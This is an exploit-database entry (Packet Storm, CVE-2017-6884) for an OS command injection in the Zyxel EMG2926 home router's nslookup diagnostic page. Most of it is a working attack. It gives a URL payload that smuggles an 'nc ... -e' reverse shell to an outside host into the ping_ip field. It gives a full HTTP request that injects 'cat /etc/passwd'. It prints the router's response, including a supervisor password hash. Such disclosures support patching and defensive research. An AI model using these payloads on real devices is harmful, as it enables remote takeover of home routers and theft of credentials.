Zyxel / EMG2926 Command Injection

2017-04-02T00:00:00
ID PACKETSTORM:141900
Type packetstorm
Reporter Trevor Hough
Modified 2017-04-02T00:00:00

Description

                                        
                                            `# Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection  
# Date: 2017-04-02  
# Exploit Author: Fluffy Huffy (trevor Hough)  
# Vendor Homepage: www.zyxel.com  
# Version: EMG2926 - V1.00(AAQT.4)b8  
# Tested on: linux  
# CVE : CVE-2017-6884  
  
OS command injection vulnerability was discovered in a commonly used  
home router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools  
specify the nslookup function. A malicious user may exploit numerous  
vectors to execute arbitrary commands on the router.  
  
Exploit (Reverse Shell)  
https://192.168.0.1/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&  
ping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p  
  
Exploit (Dump Password File)  
Request  
GET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1  
Host: 192.168.0.1  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Referer: http://192.168.0.1/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup  
Accept-Language: en-US,en;q=0.8  
Cookie: csd=9; sysauth=<Clipped>  
Connection: close  
  
Response (Clipped)  
<textarea cols="80" rows="15" readonly="true">root:x:0:0:root:/root:/bin/ash  
daemon:*:1:1:daemon:/var:/bin/false  
ftp:*:55:55:ftp:/home/ftp:/bin/false  
network:*:101:101:network:/var:/bin/false  
nobody:*:65534:65534:nobody:/var:/bin/false  
supervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash  
admin:$1$<Clipped>:0:0:admin:/:/bin/fail  
  
`